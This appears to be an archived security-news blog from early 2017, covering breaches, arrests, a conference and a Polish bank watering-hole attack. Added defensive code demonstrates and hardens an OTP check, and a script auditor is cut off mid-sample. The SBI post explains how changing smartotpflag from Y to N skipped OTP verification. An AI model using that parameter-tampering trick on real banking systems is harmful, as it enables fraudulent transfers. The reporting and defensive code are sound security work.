Sunday, 26 February 2017

Microsoft opens Cybersecurity Engagement Center in Mexico

Microsoft has announced the opening of what it calls a Cybersecurity Engagement Center in Mexico. This will join the Transparency and Cybersecurity Center for Asia-Pacific, as well as the one in India, and its Redmond Cybercrime Center.
The complex, based in the country's capital city, will serve Mexico as well as other Latin American countries, in an effort to use technology, experience, and services to protect citizens and companies from an array of cyber threats.
As highlighted in the post, some of the main objectives of this facility are:
  • Taking advantage of Microsoft’s proactive role in matters of fighting cybercrime, particularly in the dismantling of criminal organizations that operate through Botnet schemes
  • Allowing cybersecurity experts from Mexico and elsewhere in Latin America to work with Microsoft specialists to fight cybercrime together
  • Acting as a headquarters for the development of training activities in order to support the building and strengthening of technical capabilities; these activities are geared toward authorities and the public sector
According to Jean-Philippe Courtois, Executive VP and President, Microsoft Global Sales, Marketing and Operations, this newly opened complex will work in tandem with the software giant's Redmond-based Cybercrime Center opened back in 2013. The Cybercrime Center was unveiled after the merger of the digital crimes and software piracy teams, which employed 30 staff at the time, collaborating with over 70 individuals worldwide to locate and fight hacker threats and malware.
Microsoft stated it is committed to investing in Latin America by bringing over its cybersecurity capabilities to help governments identify "current threats that affect the economy’s prosperity". To make good on its promise, the company will use its "robust and trustworthy cloud computing" platform to fight cyber threats, as it has done in the past.
In concert with the opening of the facility, a Government Security Program was signed between the Redmond giant and the Federal Police (representing the Mexican government) to promote IT security. What this does is it gives participating authorities "access to the source code for current versions of Windows and Windows service packs, Windows Embedded CE, and Microsoft Office".
It is not the first time Microsoft has collaborated with authorities on this issue, as the company helped bring down the ZeroAccess botnet in conjunction with the FBI and Europol a few years ago.

63 Universities and US Government agencies breached by hacker

A “Russian-speaking and notorious financially-motivated” hacker known as Rasputin has reportedly broken into the computer systems of various US universities and government agencies and sold the stolen data on the dark web.

According to the cyber security research firm Recorded Future, the hacker gained access to the computer systems of more than 63 universities and federal, state, and local U.S. government agencies. The prominent universities include Cornell and New York University.

The firm claimed that the victims are “intentional targets of choice based on the organization’s perceived investment in security controls and the respective compromised data value. Additionally, these databases are likely to contain significant quantities of users and potentially associated personally identifiable information (PII).”

The list of Rasputin's targets is quite long and extends to 10 U.K. universities and one Indian university in Delhi as well. All the affected agencies and universities have been informed about the breach by Recorded Future's researchers.

The victims include 16 U.S. state governments, 6 U.S. cities and four federal agencies, including the Child Welfare Information Gateway, which is operated by the U.S. Department of Health and Human Services, and Fermi National Accelerator Laboratory, America’s premier particle physics lab. The severity of the breaches is unclear.

The list of U.S. university victims: Cornell University, University of the Cumberlands, Virginia Tech, Oregon College of Oriental Medicine, University of Maryland, Baltimore County, Humboldt State University, University of Pittsburgh, The University of North Carolina at Greensboro, New York University, University of Mount Olive, Rice University, Michigan State University, University of California, Los Angeles, Rochester Institute of Technology, Eden Theological Seminary, University of Tennessee, Arizona State University, St. Cloud State University, NC State University, University of Arizona, Purdue University, University at Buffalo, Atlantic Cape Community College, University of Washington.

The list of U.K. university victims: University of Cambridge, Coleg Gwent, University of Oxford, University of the Highlands and Islands, Architectural Association School of Architecture, University of Glasgow, University of Chester, the University of the West of England, University of Leeds, The University of Edinburgh.

And one Indian university: Delhi University.

Hackers could easily bypass SBI's OTP security

One Time Password (OTP) has become the standard security feature on most websites, including those of banks. It allows a user to complete an online transaction only after the customer's identity is verified by entering the OTP sent by the bank to the registered mobile number. But who knew this security feature could be easily bypassed and lead to a huge loss of money?

Neeraj Edwards, a white-hat hacker, bug bounty hunter and web application security researcher, shared his research on how he could easily bypass the OTP of one of the most popular banks, State Bank of India (SBI), and complete a transaction of any amount.

While making a transaction, the last page of SBI’s website shows a One Time Password screen whose request carries a parameter called smartotpflag, set to Y (i.e. smartotpflag=Y).

The smartotpflag parameter controls OTP generation, and Y represents ‘yes’, meaning the code is sent to the registered mobile. The risk arises if someone changes ‘Y’ to ‘N’, which means ‘No’: the transaction is then completed without entering the OTP at all.
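The bug class described above is a server that lets a client-supplied flag decide whether OTP verification happens. The toy handlers below (added for this page; not SBI's code, and the form and session shapes are assumed) show that pattern beside a hardened version where the OTP requirement is server-side policy, the code is single-use, the comparison is constant-time, and any tampered flag is logged for the SOC.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side session state (assumed shape, constructed for this example)."""
    user: str
    pending_otps: dict = field(default_factory=dict)  # txn_id -> OTP the server issued
    alerts: list = field(default_factory=list)        # tampering events for detection


class TransactionError(Exception):
    pass


def issue_otp(session, txn_id):
    """Server generates and records the OTP for a pending transaction.
    In a real deployment this is the value sent to the registered mobile."""
    otp = f"{secrets.randbelow(10**6):06d}"
    session.pending_otps[txn_id] = otp
    return otp


def vulnerable_submit(session, form):
    """Flawed pattern: the client's smartotpflag decides whether the OTP is checked.
    Sending smartotpflag=N skips verification entirely, as the article describes."""
    txn_id = form["txn_id"]
    if form.get("smartotpflag", "Y") == "Y":
        expected = session.pending_otps.get(txn_id)
        if expected is None or form.get("otp") != expected:
            raise TransactionError("invalid OTP")
    return f"completed {txn_id} for {form['amount']}"


def hardened_submit(session, form):
    """Hardened pattern: OTP is mandatory for every funds transfer, regardless of
    any flag the client sends; the flag is only used as a tampering signal."""
    txn_id = form["txn_id"]
    # Detection: a client should never send anything other than Y here.
    flag = form.get("smartotpflag")
    if flag not in (None, "Y"):
        session.alerts.append(f"user={session.user} txn={txn_id} smartotpflag={flag}")
    expected = session.pending_otps.get(txn_id)
    if expected is None:
        raise TransactionError("no OTP issued for this transaction")
    # Single use: consume the OTP before comparing, so a failed guess cannot be retried.
    del session.pending_otps[txn_id]
    supplied = form.get("otp", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        raise TransactionError("invalid OTP")
    return f"completed {txn_id} for {form['amount']}"


def demo():
    """Runs both handlers against a constructed request with smartotpflag=N."""
    tampered = {"txn_id": "t1", "amount": "5000", "smartotpflag": "N"}
    results = {}
    s1 = Session("alice")
    issue_otp(s1, "t1")
    results["vulnerable"] = vulnerable_submit(s1, tampered)  # completes without OTP
    s2 = Session("alice")
    issue_otp(s2, "t1")
    try:
        hardened_submit(s2, tampered)
        results["hardened"] = "completed"
    except TransactionError as exc:
        results["hardened"] = str(exc)
    results["alerts"] = list(s2.alerts)
    return results


if __name__ == "__main__":
    print(demo())
```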

Although the vulnerability was patched after Edwards' discovery, it was highly disappointing that the person who could easily have profited from it, but chose not to, was neither rewarded nor acknowledged for his work.

The press did not carry this important news either, keeping the public in the dark and denying the discoverer any recognition.

Spies Hack Israeli Soldiers' Android Phones

More than 100 soldiers from the Israel Defense Forces (IDF) have become the target of a cyberespionage group when information from their mobile devices was stolen using malicious Android applications.

ViperRAT, the clandestine hacking collective, was found actively hijacking soldiers’ Android-based smartphones to remotely siphon images and audio directly from the devices.

Highly sophisticated malware allowed the attackers to control each phone’s microphone and camera. In effect, the hackers could eavesdrop on soldiers’ conversations and peer into live camera footage — wherever an affected smartphone’s camera would be pointed, that vantage point could have also been viewable to the hackers.

The dropper also sends out a list of the apps installed on the infected device. Depending on what is already installed, some variants pretend to be chat apps, while another pretends to be a YouTube player.

Other Android smartphone applications common among Israeli citizens and available in the Google Play store — including a billiards game, an Israeli Love Songs player, and a Move To iOS app — were found to contain hidden ViperRAT malware.

While the malicious actors behind ViperRAT have yet to be explicitly identified, their activity patterns suggest that the cyberespionage is being carried out by a group operating out of the Middle East.

Google looks to hire Australian hackers

Google is searching for Australia’s best and brightest hackers to employ them for hard-to-fill cyber security positions at the search giant’s own business. The tech giant's Australian hiring raid may likely exacerbate the IT skills shortage in government agencies.

Google has taken this step because of the difficulty of finding the right mix of people to fill cyber security positions. Despite the various specialised courses offered by Australian universities, not many students appear interested in taking them up. According to the Government's Cyber Security Strategy, the number of people taking information and communications technology degrees has halved over the last decade.

Moreover, “it’s difficult to find such people who have the skills of hacking into a system but ultimately want to make it more secure and not use those skills negatively and are also willing to work in a big software company,” said Google Chrome’s security head, Parisa Tabriz.

Google feels the shortage too, and is now looking to fill as many quality cyber security positions in Australia as it can.

But Google’s gain could be government’s loss. The federal government expects demand for cyber security services and related jobs — such as legal services, insurance and risk management — will grow by at least 21% over the next five years.

Government services, though, have been struggling to compete with private firms on salaries. It is a common problem for governments across the globe: when trying to attract people to jobs, they fall short of the salaries and perks that private firms offer prospective employees.

Two weeks ago, the giant US-based telco Verizon announced it has strengthened its armoury in the fight against cyber adversaries with its investment in next-generation security capabilities at its Asia-Pacific Advanced Security Operations Centre in Canberra.

The opening of the new security centre followed Verizon’s appointment last December to the federal government’s new whole of government telecommunications services panel which provides coordinated telecommunications services.

Thursday, 16 February 2017

Hitachi Payment services accepts its systems were compromised

Hitachi Payment Services conducted an audit of the security breach that had compromised about 3.2 million cards issued by Indian banks in October 2016, after the Reserve Bank of India ordered an audit four months ago.

The company confirmed on Thursday that its systems were affected by "a sophisticated injection of malware (malicious software code)" that compromised details of debit cards issued by banks.

Hitachi Payment Services, a firm that provides ATMs, point of sale and other services in India, said security audit firm SISA Information Security has completed its final assessment report on the breach and found that the highly sophisticated malware had worked undetected and concealed its tracks during the compromise period between May 21 and July 11, 2016.

“While the behavior of the malware and the penetration into the network has been deciphered, the amount of data exfiltrated during the above compromise period is unascertainable due to secure deletion by the malware,” said a statement released by Hitachi Payment Services.

The National Payments Corporation of India (NPCI), which oversees payment systems in India, found that almost 90 ATMs in the country were compromised through malware and that at least 641 customers across 19 banks lost Rs 1.3 crore to fraudulent transactions on their debit cards.

Loney Antony, managing director of Hitachi Payment Services, said: “…we confirm that our security systems had a breach during mid-2016. As soon as the breach was discovered, we followed due process and immediately informed the RBI, National Payments Corporation of India (NPCI), banks and card schemes. We also partnered with banks to ensure the safety of their customers’ sensitive data. As a result, the extent of compromise was limited and we have not seen any further misuse due to the containment measures deployed by Hitachi Payment Services."


A hacker group in the Russian Federation whose members were suspected of stealing funds from accounts at Russian financial institutions has been dismantled, according to Irina Wolf, spokesman for the Ministry of Internal Affairs of the Russian Federation.

"In May 2016, after effective interaction between the Ministry of Internal Affairs and the Federal Security Service of the Russian Federation, an unprecedented interdiction operation was carried out against the hacker group, whose members lived in 17 different locations of the country and had taken part in the misappropriation of funds from accounts of Russian financial institutions since 2013," Wolf stated in the report published on the website of the Ministry of Internal Affairs. "Over the period of its activity, 50 members managed to transfer more than 1 billion rubles."

The spokesman of the Ministry of Internal Affairs added that, besides bank accounts, the attackers had also hacked critical infrastructure, including strategic industrial enterprises.

Searches were conducted, during which computers, storage media and means of communication, as well as firearms and edged weapons, were seized.

"At the moment 27 organizers and participants of the group, of whom 19 are suspects, have been held criminally liable. The court has ordered their remand in custody," the statement on the website read. The matter remains under investigation.

Friday, 10 February 2017

Feds Bust Alleged Russian Bank Hacker in Los Angeles

A federal investigation into a Russian cybercrime ring led Secret Service agents to the doorstep of a 29-year-old Los Angeles man the United States calls an “extremely sophisticated and well-connected cybercriminal” who allegedly used malware to steal cash from thousands of U.S. bank accounts.
Alexander Tverdokhlebov was arrested in an early-morning raid Feb. 1 on a four-count wire-fraud indictment alleging that he worked with a Russian colleague in 2009 and 2010 to attack U.S. financial institutions. He allegedly used a botnet of 10,000 hacked PCs.
Tverdokhlebov is being held in the Metropolitan Detention Center in Los Angeles pending a bail review in Alexandria, Virginia, where he’s charged.
Long before the Kremlin was known for hacking political campaigns, Russian hackers and their peers in Ukraine dominated the for-profit cybercrime underworld, from the large-scale credit-card heists of the mid-2000s to today’s ransomware threat. And banking botnets have been a staple of Russian cybercrime for nearly a decade.
Instead of stealing passwords for a hacker to use later, the malware will wait for the victim to log in to their online banking, then splice itself into the connection and slip in a rogue funds transfer without setting off alarms at the bank. If the victim happens to check their balance or transaction history, the malware will even rewrite it on the fly to conceal the theft.
The Russian-made Zeus malware first proved the concept in 2009, and is behind, by some estimates, billions of dollars in losses over the years. Zeus’s alleged author, Evgeniy Bogachev, was even among the Russians sanctioned by President Obama last December in retaliation for the Kremlin’s election hacking, and the FBI has a $3 million reward out for his arrest.
The U.S. discovered Tverdokhlebov while examining the online chats of a different Russian: Vadim Polyakov, a 32-year-old St. Petersburg man who pleaded guilty last year to a million-dollar concert-ticket scam. Polyakov ran a crime ring that hacked consumers’ StubHub accounts to buy thousands of e-tickets for resale. He was arrested in Spain and extradited to the U.S. In July, a New York judge sentenced him to four to 12 years in state prison.
Court records don’t indicate how the Secret Service obtained Polyakov’s ICQ chat logs. The most likely scenario is that Spanish authorities seized Polyakov’s laptop at his arrest. In any event, the chat logs showed Polyakov conversing in Russian with a fellow cyberthief who let slip enough information to identify Tverdokhlebov as a suspect, specifically his first name, his girlfriend’s full name, and his home address and his phone number.
The indictment against Tverdokhlebov is based entirely on the years-old chats, with no hard information about specific thefts, suggesting that the feds are using it as a wedge to try and pry more evidence from Tverdokhlebov’s arrest and the search of his computers.
Over government objections, a magistrate judge set Tverdokhlebov’s bail at $100,000 last week but stayed the man’s release pending a government appeal, set to be heard in Virginia on Friday. The feds are urging that Tverdokhlebov be held without bail, claiming that he has few ties to the U.S. and enough underworld contacts to flee to Mexico and from there to Russia.
Tverdokhlebov was born in Russia and obtained U.S. citizenship in 2009 after marrying an American. According to prosecutors, the two have since divorced.
Secret Service agents have spent the days since Tverdokhlebov’s arrest opening his safe-deposit boxes. Three boxes in California were packed with $172,000 in $100 bills. A key locked in one box turned out to fit a fourth safe-deposit box in Las Vegas, where on Tuesday the feds found an additional $100,000.
“The large quantity of cash, as well as their distribution in safe-deposit boxes in different states, suggests that defendant may have concealed funds elsewhere in preparation for flight,” prosecutors wrote, urging that Tverdokhlebov be kept in jail.
Tverdokhlebov’s attorney, William Cummings, countered in a filing Thursday that his client is legitimately employed in Los Angeles and that the charges in the Virginia indictment are old.
Cummings also implied that with every cash-filled safe deposit box the feds find, his client becomes an even better candidate for pre-trial release. “The defendant, if he were on release, could now not go to Las Vegas to access that money,” he wrote.

nullcon Information Security Conference 8Bit, Goa 2017

nullcon was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero day vulnerabilities and unknown threats. Our motto, "The neXt security thing!", drives the objective of the conference, i.e. to discuss and showcase the future of information security and the next generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why the current technology is not sufficient and what the focus should be for the coming years pertaining to information security. In addition to security, one of the sections of the conference, called Desi Jugaad (Hindi for "Local Hack"), is dedicated to hacking, where we invite researchers who come up with innovative security/tech/non-tech solutions for solving real life challenges or taking up new initiatives.

The nullcon conference is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference. It is an integrated and structured platform, which caters to the needs of IT Security industry at large in a comprehensive way.

The event consists of 25 speeches and 11 training sessions, which cover all major topics of the IT security industry. The conference is created for security companies/enthusiasts so they can showcase the most up to date research and technology on the topic. The shared knowledge is usually used afterwards within the organizations. Moreover, we host an Exhibition, Free Workshops, CTF Hacking competitions, a Job Fair, the BlackShield Awards and other events at the conference.

The Keynote will be addressed by Joshua Pennell, Founder & President, IOActive, following which we would have talks by various international security researchers on topics such as, ATM Hackings, Drone Hijacking, Telecom Protocol Security, Blockchain issues, Cloud Security, Bug Hunting, Social Engineering, Botnets and lots more.

With nullcon 8-bit edition we have made a lot of changes bringing the conference to the next level:
  • We anticipate 1000 attendees,
  • Additional DevOps Security Track,
  • New Trainings on Cloud Security, IoT, Infrastructure, Hardware Security,
  • New CXO Panel session,
  • Larger exhibition vendor area etc.

Nullcon Goa 2017 Dates:
  • Training - 28th Feb to 2nd March 2017
  • Conference - 3rd to 4th March 2017

New Venue:
Holiday Inn Resort, Mobor Beach, Cavelossim, Salcette, Goa - India.
Registration is still open! Get your pass here:

Thursday, 9 February 2017

Closing the Loop in Cyberspace

CyberBit, the cyber technology company established by Elbit Systems under the direction of Adi Dar, implements in cyberspace a proven military concept: prompt loop closure to contain cyber events. For some time now, the cyber technology industry has been discussing the need to operationalize the cybersecurity process. The idea here is that a company that accomplished that objective on the battlefield would be able to accomplish it in cyberspace, too.
"CyberBit implements a holistic cybersecurity concept, based on four primary elements: intelligence gathering, data analysis, command & control and an enforcement capability," explains Adi Dar, CyberBit's CEO. "Elbit Systems have been involved in cyber technology for more than 15 years. It began with the acquisition of Elron Telesoft in 2001 and the establishment of Elbit's ISTAR Division, and evolved in April 2015 into CyberBit. Back then, they did not call it cyber technology, but the foundations had been cast years ago.
"The establishment of CyberBit followed a management decision to offer Elbit Systems' cyber technology capabilities to the civilian market, too, and to leverage Elbit Systems' cyber technology assets for that end. In the civilian world, you must operate differently. You need unsupervised freedom of operation, you have to develop a brand, stay innovative and respond promptly. In the defense/security world, Elbit is a solid brand, but that does not help if you want to sell a cybersecurity solution to a bank, an insurance company or a retail chain.
"For this reason, CyberBit is made up of two sub-units – one sells products to the HLS world and the other to the civilian world. The company that sells to the civilian world is unsupervised and its employees do not have to undergo a security vetting process. It uses a separate IT network and is run like any other cyber technology company around the world."
"One of the moves we made was the acquisition, in July 2015, of the cyber technology division of the NICE Company," explains Dar. "This move had matured three months after the establishment of CyberBit. The idea was to acquire the assets of the NICE Company in the field of intelligence gathering, combine them with Elbit's knowledge management and C3 capabilities, and combine all of that with the assets of the 4C Company Elbit had acquired back in 2011."
One of the solutions CyberBit offers belongs in the EDR (Endpoint Detection & Response) category. It is a client installed at the core (kernel) level of a workstation or server, beneath the operating system's user-facing layers. It "sees" and records many of the processes taking place on the computer. The data from all of the clients throughout the organization are collected by a Big Data system and used to run algorithms that search for patterns indicating a cyberattack.
"Each workstation produces dozens of megabytes per day," explains Dar. "If the organization has 100,000 workstations, it will amount to a lot of data that should be managed and analyzed every day. Not many companies in this field can accomplish that on such a scale.
"The ability to analyze the data from all of the workstations in the network makes it possible to identify a pinpoint attack against a specific workstation, and mainly to identify attacks where the attacker moves laterally through the network. Pursuant to the identification stage, the client may be issued with an enforcement command to kill processes in that workstation. In this way, the threat is contained very quickly. The combination of a client at the core level and Big Data capabilities gives us an advantage in the market."
Along with collection of intelligence from the clients fitted to the organization's workstations and servers, CyberBit offers legitimate intelligence gathering solutions, which include Open Source Intelligence (OSInt) and intelligence gathering capabilities for stationary or mobile communication networks, including satellite communication networks. "Combining all of these activities enables us to provide a systemic intelligence gathering solution – from the organization and from the outside environment. This improves the organization's ability to identify cyberattacks," says Dar.
Another solution is a SOC (Security Operations Center) management system: a system for managing the organizational cybersecurity operations center, intended to provide transparency into the organization's networks. The SOC should effectively manage the response to cyberattacks.
"This product enables automation of the SOC procedures," explains Dar. "These centers are normally manned by people just starting out in the world of cyber technology. They come to work there for a short period of time, hone their professional skills and leave. Moreover, major organizations deploy multiple SOCs at various locations around the world, so as to avoid overtime pay. It is known as 'Follow the Sun'. When the sun sets over one country, it rises over another country, and the management of the SOC follows the sun.
"If you combine these two elements vis-à-vis the fact that a high-quality cyberattack against an organization can last months, you will realize that without automation of the SOC procedures, the organization will not be equipped to cope effectively with such an attack. At this point, Elbit's experience in the C3 world comes into the picture. In the end, you are talking about numerous sensors that produce logs, and you need an application with a rules engine to provide the analysts at the SOC with a scale of priorities."
Another field of activity in which CyberBit is involved is cybersecurity for SCADA (Supervisory Control and Data Acquisition) infrastructures. These are assets the 4C Company had brought into Elbit Systems. "In SCADA networks, we perform passive monitoring along with the ability to stop inline attacks," says Dar. "The OT system world is simpler than the IT world as it has a finite number of protocols. It is a more structured world. At the same time, since the Stuxnet worm was identified and the electrical infrastructure of the Ukraine was attacked in December 2015, there has been more understanding of the significance of the threat. This is the reason why many countries are developing regulation in the field of SCADA security."

Replacing Anti-Virus Software

According to Dar, one of the threats that currently challenges the industry is ransomware. "This is a threat that compels you to resort to real-time blocking, even before the encryption, but it is very difficult to catch before the encryption. If you catch it after the encryption, you will have no guarantee about being able to save the information – and that is a fairly complex challenge.
"Ransomware changed the demands of the clients, and now they want response – not just detection. It is nice if you managed to detect it, but what will the organization do with it? And in order to respond, you need a client on the computer. That leads to a war over the clients. I had a meeting with an information security manager of a bank, who told me that they have nine clients on the computer. The battle today is over the 'real estate' in the workstation or server. Ransomware can damage a large number of end stations, and even servers. We know how to contain the infected devices so as to prevent the threat from spreading. According to some of the estimates in the market, this technology will replace anti-virus software."
Unlike the defense industry, which has a well-defined and relatively 'niche type' target market, with civilian cybersecurity solutions the market is endless. Private clients, SMBs or major clients in every country around the world already need or will need cybersecurity solutions.
"There will be no escaping the transfer of cybersecurity solutions to the cloud," says Dar. "If I could place the EDR in the cloud, while at the same time installing it in all of the client's devices, I would have solved a major percentage of the client's problems. One must understand that smaller organizations do not have an information security team or an SOC. Cybersecurity for SMBs (Small to Medium Businesses) must be provided through their cloud information security service provider or MSSP (Managed Security Service Provider). I am referring to cybersecurity services for organizations with a personnel of 100-150 employees or less that cannot afford to finance more expensive solutions.
"CyberBit is not there yet, but we understand that this is the right direction. We can see a trend of transition to the cloud, although the truly sensitive information as well as the client of the EDR are not being transferred to the cloud yet. That will take time. Soon we will have to make a decision as to whether we want to remain a provider of technology exclusively, or provide cloud services as well.
"It is important to note that CyberBit does not compete against defense/security industries that offer cyber technology products, but against civilian cyber technology companies. For a defense/security industry it is inconceivable to provide cloud services to SMBs. For us it is a very realistic question. It is a part of our future. Elbit Systems established CyberBit in order to develop a civilian cyber technology industry, and the future of that industry is in the cloud and in mass-produced solutions, like anti-virus software. That's where the money is."

InterContinental Hotels Confirms Credit Card Breach

InterContinental Hotels Group (IHG), parent company to Crowne Plaza, Holiday Inn and Kimpton Hotels and Resorts, confirmed on Friday a breach of payment card systems used in 12 of its hotels located in North America and the Caribbean.
According to IHG, which operates 5,000 hotels worldwide, malware was found on servers used to process credit cards. The servers were infected between last August and December; the company declined to say how many payment cards were impacted.
In a statement released Friday, IHG said it found malware installed on servers used at popular destinations such as Michael Jordan’s Steak House and Bar in Chicago, the Holiday Inn San Francisco Fisherman’s Wharf, the Copper Lounge in Los Angeles, and the Palm Bar in Aruba. A full list of locations impacted was posted by IHG.
The hotelier reported on Dec. 28 that it was investigating customer complaints of unauthorized charges on credit cards. At the time, the company said only a limited number of destinations were impacted before revealing more details on Friday.
“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties,” according to a statement. “Cards used at the front desk of these properties were not affected.”
According to IHG, the malware searched for magnetic stripe track data as it was being routed through servers. Track data included cardholder name, card number, expiration date and internal verification code. There is also no information provided on the strain of malware used in the attacks.
Hotels, restaurants and other hospitality outlets are frequently singled out as victims of opportunistic hackers. Last year alone there were nearly a dozen reports of card breaches. One of those breaches occurred in August and included 20 hotels run by HEI Hotels and Resorts, which owns chains Marriott, Sheraton, and Westin. Similarly, malware was used to siphon payment card data.
The prevalence of malware use to steal payment card data hit a peak in 2014 when it was at the center of several high-profile breaches, including Target and Neiman Marcus.
As recently as last November, security researchers at Trustwave said the Carbanak cybercrime gang, first discovered by Kaspersky Lab, had shifted strategy and began targeting the hospitality and restaurant industries with new techniques and malware. Part of the Carbanak tactics involved targeting hospitality call centers with elaborate ploys to get customer service representatives to accept and download emails with malicious macro-laced documents. The target was credit card data scraped from the memory of point-of-sale systems.
“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG wrote in a statement regarding the breach.

Smart TV Manufacturer Vizio Fined $2.2M for Tracking Customers

Smart TV manufacturer Vizio tracked data on 11 million of its customers' TVs without their knowledge or consent, the Federal Trade Commission announced this week.
The Irvine, Calif.-based company agreed on Monday to pay $2.2 million to settle charges that it collected large volumes of data about its customers. Besides tracking which programs users watched, the company also tracked information corresponding to customers' sex, age, income, marital status, household size, education level, home ownership and household value.
According to a complaint filed by the agency in the U.S. District Court for the District of New Jersey on Monday, Vizio tracked users through proprietary automated content recognition (ACR) software made by a subsidiary, Inscape Services. While that software has been turned on by default since 2014 on most of Vizio's televisions, the FTC alleges that in some instances the company remotely installed it on previously sold televisions that lacked the software.
The software feeds Vizio a "second-by-second" transmission of what its consumers watch, regardless of whether it's on cable, on demand, a streaming device like Google's Chromecast or Amazon's Fire Stick, or even a DVD. According to the complaint, the software has considerable reach and is able to capture "up to 100 billion data points each day from more than 10 million VIZIO televisions."
In addition to household demographics, the software also siphoned up technical details such as the home’s IP address, wired and wireless MAC addresses, how strong the home’s WiFi was, and even any nearby WiFi networks, the complaint (.PDF) reads.
The complaint alleges the company sold this information to third party companies who first used it to analyze the effectiveness of advertising, and then used it in targeted advertising.
“Defendants provide these third parties with IP addresses, so that the third parties can analyze a household’s behavior across devices, in order to determine, for example, (a) whether a consumer has visited a particular website following a television advertisement related to that website, or (b) whether a consumer has viewed a particular television program following exposure to an online advertisement for that program. The data is used in the aggregate to evaluate the effectiveness of advertising campaigns,” the complaint reads.
The company failed to provide users with any notice their viewing habits were being tracked. It wasn’t until March 2016 – in the midst of investigations against the company – that Vizio sent users a quick pop-up notification on their television notifying them their viewing data was being collected.
“This notification timed out after 30 seconds without input from the household member who happened to be viewing the screen at the time, and did not provide easy access to the settings menu,” the complaint reads.
Going forward, the company is required to disclose and obtain consent for any information it collects in the future, to be transparent about what it's doing with its customers' information, and to develop a data privacy program subject to assessment every two years.
As part of the settlement Vizio is also being asked to erase any data it may have collected before March 1, 2016. Of the $2.2 million paid to settle the matter, $1.5 million will go to the FTC, another $1 million to the New Jersey Division of Consumer Affairs, with $300,000 of that amount suspended.
Vizio, for its part, issued a press release shortly after the settlement was announced on Monday saying it was "pleased to reach this resolution" and that it set a "new standard for best industry practices." At the same time, the company also took a moment to clarify exactly what kind of customer information its ACR program gathered.
According to Jerry Huang, Vizio’s General Counsel, the program didn’t pair viewing data with personally identifiable information; instead, as the complaint specifies, it was used “in the ‘aggregate’ to create summary reports.”
“VIZIO is pleased to reach this resolution with the FTC and the New Jersey Division of Consumer Affairs. Going forward, this resolution sets a new standard for best industry privacy practices for the collection and analysis of data collected from today’s internet-connected televisions and other home devices,” stated Jerry Huang, VIZIO General Counsel. “The ACR program never paired viewing data with personally identifiable information such as name or contact information, and the Commission did not allege or contend otherwise. Instead, as the Complaint notes, the practices challenged by the government related only to the use of viewing data in the ‘aggregate’ to create summary reports measuring viewing audiences or behaviors.”
“Today, the FTC has made clear that all smart TV makers should get people’s consent before collecting and sharing television viewing information and VIZIO now is leading the way,” concluded Huang.
In the FTC's eyes, Vizio's statement runs counter to an earlier securities filing by the company. In the filing, Vizio claims its data analytics program "provides highly specific viewing behavior data on a massive scale with great accuracy, which can be used to generate intelligent insights for advertisers and media content providers."
The FTC’s Acting Chairman Maureen K. Ohlhausen said Monday that Vizio’s practices, specifically how it failed to disclose the fact it was tracking users, were unfair and deceptive.
“Evidence shows that consumers do not expect televisions to collect and share information about what they watch. Consumers who are aware of such practices may choose a different television or change the television’s settings to reflect their preferences,” Ohlhausen wrote. (.PDF)
The FTC filed a complaint against another major technology company, D-Link, earlier this year. In that complaint, the agency alleged the router manufacturer failed to adequately secure its wireless routers and IP cameras, something that could have potentially put its customers’ data at risk of compromise.

Wednesday, 8 February 2017

Polish banks hit by malware sent through hacked financial regulator

Polish banks are investigating a massive systems hack after malware was discovered on several companies' workstations.
The source of the executables? The sector's own financial regulator, the Polish Financial Supervision Authority (KNF).
A spokesman for the KNF confirmed that the regulator's internal systems had been compromised by someone "from another country". When it was discovered that the regulator's servers were hosting malicious files that were in turn infecting banks' systems, the decision was made to take down the KNF's entire system "in order to secure evidence."
According to one cybersecurity site that spoke to several banks and carried out a preliminary analysis, the banks confirmed that they had seen unusual network traffic and found encrypted executables on several servers. The details were quickly shared among the country's roughly 20 commercial banks, and other banks began reporting the same issues.
Ironically, it is the KNF that sets cybersecurity standards for Polish banks. The compromise is thought to have come through a modified JavaScript file on the regulator's website: visitors to the site loaded an external JavaScript file, which then pulled down malicious payloads, a watering-hole attack aimed at the regulator's own audience.
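Two checks catch the mechanism just described early: an inventory of every script the page loads, flagging includes from origins that are not on an allow-list and third-party includes with no Subresource Integrity hash, plus a hash comparison of the site's own first-party scripts against a known-good baseline (the KNF case was a modified first-party file, which an origin check alone would not flag). The code below is an added example, not anything published by the KNF, the banks or the analysts; the page, the origin www.example.org, the allow-list, the hostnames cdn.example and evil.example, and the baseline script body are all constructed.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collects every <script src=...> tag together with its integrity attribute, if any."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append({"src": a["src"], "integrity": a.get("integrity")})


def script_origin(src: str, page_origin: str) -> str:
    """Origin a script is fetched from; relative and scheme-relative URLs are resolved."""
    u = urlparse(src)
    if not u.netloc:
        return page_origin
    scheme = u.scheme or urlparse(page_origin).scheme
    return f"{scheme}://{u.netloc}"


def audit_scripts(html: str, page_origin: str, allowed_origins: set) -> list:
    """Flag includes from unexpected origins and allowed third-party includes lacking SRI."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        origin = script_origin(s["src"], page_origin)
        if origin == page_origin:
            continue  # first-party file: covered by the baseline hash check instead
        if origin not in allowed_origins:
            findings.append(("unexpected-origin", s["src"]))
        elif not s["integrity"]:
            findings.append(("no-sri", s["src"]))
    return findings


def changed_files(current: dict, baseline: dict) -> list:
    """Paths of first-party scripts whose sha256 no longer matches the recorded baseline."""
    return sorted(path for path, body in current.items()
                  if hashlib.sha256(body).hexdigest() != baseline.get(path))


# Constructed inputs (assumed origin, allow-list, page and script body; not real indicators).
PAGE_ORIGIN = "https://www.example.org"
ALLOWED_ORIGINS = {"https://cdn.example"}
KNOWN_GOOD_APP_JS = b"window.app = {};\n"
BASELINE = {"/static/app.js": hashlib.sha256(KNOWN_GOOD_APP_JS).hexdigest()}
SAMPLE_HTML = """
<html><head>
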